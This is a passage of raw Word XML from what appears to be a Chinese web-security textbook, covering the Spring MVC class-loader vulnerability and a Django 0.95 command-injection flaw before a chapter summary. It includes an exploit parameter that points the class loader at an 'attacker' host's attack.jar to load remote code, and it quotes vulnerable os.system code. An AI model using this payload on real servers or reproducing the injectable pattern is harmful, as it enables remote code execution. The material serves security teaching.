        <w:t>2.5.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>框架允许使用客户端所提供的数据来更新对象属性，而这一机制允许攻击者修</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-31"/>
        </w:rPr>
        <w:t>改 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>class.classloader </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>加载对象的类加载器的属性，这可能导致执行任意命令。例如，攻击者可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>将类加载器所使用的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>修改到受控的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="503"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）创建 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>attack.jar </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>并可通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP URL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>使用。这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jar </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>必须包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>META-INF/spring-form.tld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，定义 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>表单标签并指定实现为标签文件而不是类；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="912" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="911" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings"/>
          <w:color w:val="818181"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>META-INF/tags/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>中的标签文件，包含标签定义（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>任意 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-101"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="503"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）通过以下 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>参数向表单控制器提交 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="166"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>cla</w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New"/>
            <w:sz w:val="16"/>
            <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
          </w:rPr>
          <w:t>ss.classLoader.URLs[0]=jar:http://attacker/attack.jar!</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>/</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这会使用攻击者的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>覆盖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>WebappClassLoader </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>repositoryURLs </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>属性的第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个元素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="503"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）之后 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>org.apache.jasper.compiler.TldLocationsCache.scanJars()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>会使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>WebappClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>解析标签库，会对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TLD </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中所指定的所有标签文件解析攻击者所控制的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="175" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这个漏洞将直接危害到使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架的网站，而大多数程序员可能并不会注意到这个问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1201" w:val="left" w:leader="none"/>
          <w:tab w:pos="1202" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1201" w:right="0" w:hanging="998"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> 命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="199"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0.95 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>版本中，也出现了一个远程执行命令漏洞，根据官方代码 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:bookmarkStart w:name="12.7.4  Django命令执行漏洞" w:id="82"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>后的细节，可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>以看到这是一个很明显的“命令注入”漏洞，我们在“注入攻击”一章中，曾经描述过这种漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="157"/>
        <w:ind w:left="203" w:right="149" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在处理消息文件时存在问题，远程攻击者构建恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.po</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件，诱使用户访问处理，可导致以应用程序进程权限执行任意命令</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4840">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>839760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3875756" cy="1714023"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="45" name="image32.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="46" name="image32.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3875756" cy="1714023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="185"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的漏洞代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4864;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,10.549909pt" to="158.16pt,10.549909pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark15" w:id="83"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="_bookmark15" w:id="84"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>ttps://code.djangoproject.com/changeset/3592</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>漏洞代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:8.010957pt;width:411.15pt;height:19.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4888;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="3950" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>cmd = 'msgfmt -o "%s.mo" "%s.po"' % (pf, pf) os.system(cmd)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="223" w:firstLine="419"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>这是一个典型的命令注入漏洞。但这个漏洞从利用上来说，意义不是特别大，它的教育意义更为重要。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>12.8</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>在本章中讲述了一些 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkStart w:name="12.8  小结" w:id="85"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架中可以实施的安全方案。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架本身也是应用程序的一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>个组成部分，只是这个组成部分较为特殊，处于基础和底层的位置。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架为安全方案的设计提供了很多便利，好好利用它的强大功能，能够设计出非常优美的安全方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>但我们也不能迷信于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>框架本身。很多 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架提供的安全解决方案有时并不可靠， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>我们仍然需要自己实现一个更好的方案。同时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>框架自身的安全性也不可忽视，作为一个基础服务，一旦出现漏洞，影响是巨大的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
